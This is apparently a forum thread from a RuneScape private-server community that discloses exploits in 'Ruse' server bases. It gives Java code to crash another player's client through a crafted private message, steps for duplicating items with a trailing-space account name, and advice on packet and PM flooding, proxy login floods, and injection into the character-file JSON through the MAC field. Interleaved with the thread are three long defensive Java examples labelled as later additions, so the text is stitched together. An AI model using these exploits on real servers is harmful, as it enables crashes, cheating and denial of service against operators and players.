(If your private message contains the character �, the other person's client will crash)
Code:
String message = "what level should i start killing lavas?�";
long aLong953 = TextClass.longForName("pure noob"); //Replace "pure noob" with the person you want to crash
player.getStream().createFrame(126);
player.getStream().writeWordBigEndian(0);
int k = player.getStream().currentOffset;
player.getStream().writeQWord(aLong953);
It has been a while since I have done this exploit, but I can see that this exists on all Ruse servers (due to the methods involved).
Requirements:
- You'll need to use either a modified client or Reflection to connect to the server with two accounts
1. The first account needs to be signed in with the items you want to dupe
2. The second account, you'll need to create with the EXACT same name as the account you wish to dupe, but the account MUST have a space at the end. (For Example "jet kai" & "jet kai ")
3. You'll need to trade over the items you wish to dupe on the second account (or drop them to the other account). Once you have the items transferred over, if you log out & login, the account will save with those items PERMANENTLY.
4. Logout & Login, trade the items to your other account and continue to Logout & Login, the items will be infinitely duped - This is abusing the Ruse Login & Saving code
for (int k1 = 0; k1 < 4; k1++)
for (int i2 = 1; i2 < 103; i2++)
for (int k2 = 1; k2 < 103; k2++)
aClass11Array1230[k1].anIntArrayArray294[i2][k2] = 0;
Extra Stuff:
You can also force open any interface and use the buttons on them, some servers may have Admin Interfaces that you can interact with (without any checks)
Ruse sources do not have any packet limits, you can flood as many packets as you want
Ruse checks certain names client-side, meaning you can have a name that no one else can sign into using the Ruse client - such as "Mod", "Admin", "Dev"
You can also flood Private Messages with no checks, meaning you can spam everyone on the server with various messages, such as Justin Bieber Baby lyrics
Bruteforcing, flooding & hacking is extremely fast & easy on Ruse bases - If you'd like to fix this, feel free to [Only registered and activated users can see links. Click Here To Register...] for some tips
Probably missed a few, but these were the packets I had in my custom MoparScape Bot Client (for Ruse servers). If you'd like to contribute, feel free to reply with any further packets and I can credit you.
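A server-side guard against the look-alike-name and client-side reserved-name issues listed above, as an added example that is not part of the original post or of the Ruse source: each login name is reduced to one canonical key, names not already in canonical shape are rejected, and the same key drives both the online check and the save file. The class name `LoginNames`, the 12-character limit, the underscore handling and the reserved list are assumptions.

```java
import java.util.Locale;
import java.util.Optional;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;
import java.util.regex.Pattern;

/** Added example: server-side login-name handling (hypothetical class, not Ruse code). */
public final class LoginNames {
    // Assumed policy: letters/digits separated by single spaces, no leading or trailing space.
    private static final Pattern VALID = Pattern.compile("[a-z0-9]+( [a-z0-9]+)*");
    private static final int MAX_LEN = 12; // assumed limit
    // Reserved names are enforced here, on the server, not only in the client.
    private static final Set<String> RESERVED = Set.of("mod", "admin", "dev");
    // Canonical keys of the sessions that are currently online.
    private final Set<String> online = ConcurrentHashMap.newKeySet();

    /** Returns the canonical key, or empty if the raw name must be rejected. */
    public static Optional<String> canonicalKey(String raw) {
        if (raw == null || raw.isEmpty() || raw.length() > MAX_LEN) return Optional.empty();
        String key = raw.toLowerCase(Locale.ROOT).replace('_', ' ');
        // Reject instead of trimming, so "jet kai " never becomes a second identity.
        if (!VALID.matcher(key).matches() || RESERVED.contains(key)) return Optional.empty();
        return Optional.of(key);
    }

    /** Atomically claims the name; false if it is invalid or already logged in. */
    public boolean tryLogin(String raw) {
        return canonicalKey(raw).map(online::add).orElse(false);
    }

    public void logout(String key) { online.remove(key); }

    /** The save path is derived from the same key that the online check uses. */
    public static String saveFileFor(String key) { return key.replace(' ', '_') + ".json"; }

    public static void main(String[] args) {
        LoginNames names = new LoginNames();
        // Constructed inputs: exact name, case/underscore variant, trailing space, reserved name.
        for (String raw : new String[] {"jet kai", "Jet_Kai", "jet kai ", "Admin"})
            System.out.println("[" + raw + "] accepted: " + names.tryLogin(raw));
        System.out.println("save file: " + saveFileFor("jet kai"));
    }
}
```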
04-20-2021, 02:25 PM
Rythe
nice post, thanks
04-20-2021, 03:19 PM
.css
Noice B^)
Let the games begin
04-20-2021, 04:52 PM
jet kai
I’ll upload some source code later (using Reflection), if anyone is interested in trying these exploits. Packets will be included in the source. You’ll just need to change the jar to the client you want to run it with. IJ is ideal.
04-20-2021, 05:50 PM
RuneLivesRSPS
Ruse was a good base for its time. Perhaps this will encourage some to learn how to migrate to updated sources, so we can grow as a community.
04-20-2021, 06:01 PM
mikan
god bless kai fixing this on nr right now :pray: thank you
Quote:
Originally Posted by RuneLivesRSPS
Ruse was a good base for its time. Perhaps this will encourage some to learn how to migrate to updated sources, so we can grow as a community.
true, maybe this will encourage some people to learn how to migrate themselves
04-20-2021, 06:23 PM
Omar
Good thread. It's kind of horrifying that some of these are even a thing.
04-20-2021, 06:27 PM
jet kai
Quote:
Originally Posted by Omar
Good thread. It's kind of horrifying that some of these are even a thing.
What’s more horrifying is that the only way any of the server owners know about it, is if you mention it to other players. They don’t even log any of it (except one server which logged the addItem void).
04-20-2021, 06:41 PM
mige5
Dunno if this is still a thing but u used to be able to basically rewrite ur character file due to the servers having change pass command and txt based char files.
04-20-2021, 06:43 PM
jet kai
Quote:
Originally Posted by mige5
Dunno if this is still a thing but u used to be able to basically rewrite ur character file due to the servers having change pass command and txt based char files.
I had tried to do that, but these sources are using JSON to store the character file information. If you can find a way to escape out the JSON parser library they are using, you’ll be able to write to the character file using the MAC address on the login packet. MAC is not checked and can be a very long string.
04-20-2021, 06:46 PM
mige5
Also u can still try to find stuff to abuse on osrs (will be very hard to find anything though).. but for example u used to be able to cast any spell from any spellbook due to jagex not verifying which spellbook u were on.
04-20-2021, 06:47 PM
JayArrowz
There is also the issue where noobs place the player saving on the netty handler threads causing all kinds of funky shit to happen and server to eventually crash.
All someone needs to do is proxy login with 1000 proxies which cost like 5$. Then logout and repeat 1000s of times per second. (Some servers require you to complete appearance)
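One way to keep character saves off the network I/O threads, as in the problem described in the post above (an added example, not code from the thread or from any Ruse source): logout only hands a snapshot to a single writer thread, and repeated requests for the same account collapse into one pending write. `SaveQueue`, `requestSave` and the `diskWrite` callback are hypothetical names.

```java
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.TimeUnit;
import java.util.function.BiConsumer;

/** Added example: character saves moved off the I/O threads (hypothetical class). */
public final class SaveQueue {
    // Latest unsaved snapshot per account; a newer snapshot replaces an older one.
    private final Map<String, String> pending = new ConcurrentHashMap<>();
    // One writer thread, so two saves of the same account can never interleave.
    private final ExecutorService writer = Executors.newSingleThreadExecutor();
    private final BiConsumer<String, String> diskWrite; // (accountKey, json) -> write file

    public SaveQueue(BiConsumer<String, String> diskWrite) { this.diskWrite = diskWrite; }

    /** Called from the I/O thread on logout; returns without touching the disk. */
    public void requestSave(String accountKey, String snapshotJson) {
        // Queue a task only when no write is pending for this account, which
        // bounds the queue by the number of distinct accounts, not by request rate.
        if (pending.put(accountKey, snapshotJson) == null) {
            writer.execute(() -> {
                String latest = pending.remove(accountKey);
                if (latest != null) diskWrite.accept(accountKey, latest);
            });
        }
    }

    /** Stops accepting work and waits for queued saves to reach disk. */
    public boolean close(long timeoutSeconds) throws InterruptedException {
        writer.shutdown();
        return writer.awaitTermination(timeoutSeconds, TimeUnit.SECONDS);
    }

    public static void main(String[] args) throws InterruptedException {
        int[] writes = {0}; // touched only by the writer thread until close() returns
        SaveQueue queue = new SaveQueue((key, json) -> writes[0]++);
        // Constructed churn: 10,000 logout saves for one account in a tight loop.
        for (int i = 0; i < 10_000; i++) queue.requestSave("jet kai", "{\"logins\":" + i + "}");
        queue.close(5);
        System.out.println("save requests: 10000, disk writes: " + writes[0]);
    }
}
```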
04-20-2021, 06:55 PM
jet kai
Quote:
Originally Posted by mige5
Also u can still try to find stuff to abuse on osrs (will be very hard to find anything though).. but for example u used to be able to cast any spell from any spellbook due to jagex not verifying which spellbook u were on.
Using a deob, I was able to flood everyone’s PM’s at the Grand Exchange on OSRS, they did not have a PM Flooder Check. Everyone enjoys Justin Bieber, even on OSRS! Since it’s a small dev team there are bound to be some things that’ll be exploitable but OSRS doesn’t really interest me anymore.
Quote:
Originally Posted by JayArrowz
There is also the issue where noobs place the player saving on the netty handler threads causing all kinds of funky shit to happen and server to eventually crash.
All someone needs to do is proxy login with 1000 proxies which cost like 5$. Then logout and repeat 1000s of times per second. (Some servers require you to complete appearance)
That’s a pretty interesting one, I did experiment with something similar to that but could never cause a ruse server to have issues with login/logout - except creating them many many many account files.
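The missing flood checks mentioned in this thread (no packet limits, no PM flood check, login/logout churn) come down to the same server-side control. The following is an added example, not code from the thread or from any Ruse source: a per-key token bucket that the packet decoder, the PM handler and the login handler can each consult before doing any work. `RateLimiter`, the key scheme and the limits are assumptions.

```java
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

/** Added example: per-key token bucket for packets, PMs or logins (hypothetical class). */
public final class RateLimiter {
    private static final class Bucket { double tokens; long lastNanos; }

    private final double capacity;     // burst size
    private final double refillPerSec; // sustained rate
    private final Map<String, Bucket> buckets = new ConcurrentHashMap<>();

    public RateLimiter(double capacity, double refillPerSec) {
        this.capacity = capacity;
        this.refillPerSec = refillPerSec;
    }

    /** True if the action is allowed; false means drop it and log a violation. */
    public boolean tryAcquire(String key, long nowNanos) {
        Bucket b = buckets.computeIfAbsent(key, k -> {
            Bucket fresh = new Bucket();
            fresh.tokens = capacity;
            fresh.lastNanos = nowNanos;
            return fresh;
        });
        synchronized (b) {
            double elapsedSec = Math.max(0, nowNanos - b.lastNanos) / 1e9;
            b.tokens = Math.min(capacity, b.tokens + elapsedSec * refillPerSec);
            b.lastNanos = nowNanos;
            if (b.tokens < 1.0) return false;
            b.tokens -= 1.0;
            return true;
        }
    }

    /** For per-session keys only; address-keyed login buckets must outlive the session. */
    public void forget(String key) { buckets.remove(key); }

    public static void main(String[] args) {
        // Assumed policy: burst of 5 private messages, then 1 per second per account.
        RateLimiter pmLimiter = new RateLimiter(5, 1.0);
        long t = System.nanoTime();
        int allowed = 0;
        // Constructed flood: 1,000 PMs from one account at the same instant.
        for (int i = 0; i < 1_000; i++) if (pmLimiter.tryAcquire("pm:jet kai", t)) allowed++;
        System.out.println("allowed during flood: " + allowed + " of 1000");
        System.out.println("allowed 2s later: " + pmLimiter.tryAcquire("pm:jet kai", t + 2_000_000_000L));
    }
}
```

Rejected actions should be written to the server log with the key and timestamp, since the thread notes that most servers record none of this.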
04-20-2021, 07:02 PM
Women
nice job god kai
04-21-2021, 12:05 AM
Co Pure Gs
Quote:
Originally Posted by JayArrowz
There is also the issue where noobs place the player saving on the netty handler threads causing all kinds of funky shit to happen and server to eventually crash.
All someone needs to do is proxy login with 1000 proxies which cost like 5$. Then logout and repeat 1000s of times per second. (Some servers require you to complete appearance)
It's also really easy to get thousands of proxies for free, but that opens up the possibility of server owners being able to block them from login with relatively little effort.
04-21-2021, 03:21 AM
Leon.
Fake, ruse is good server no problem.
Nice post :D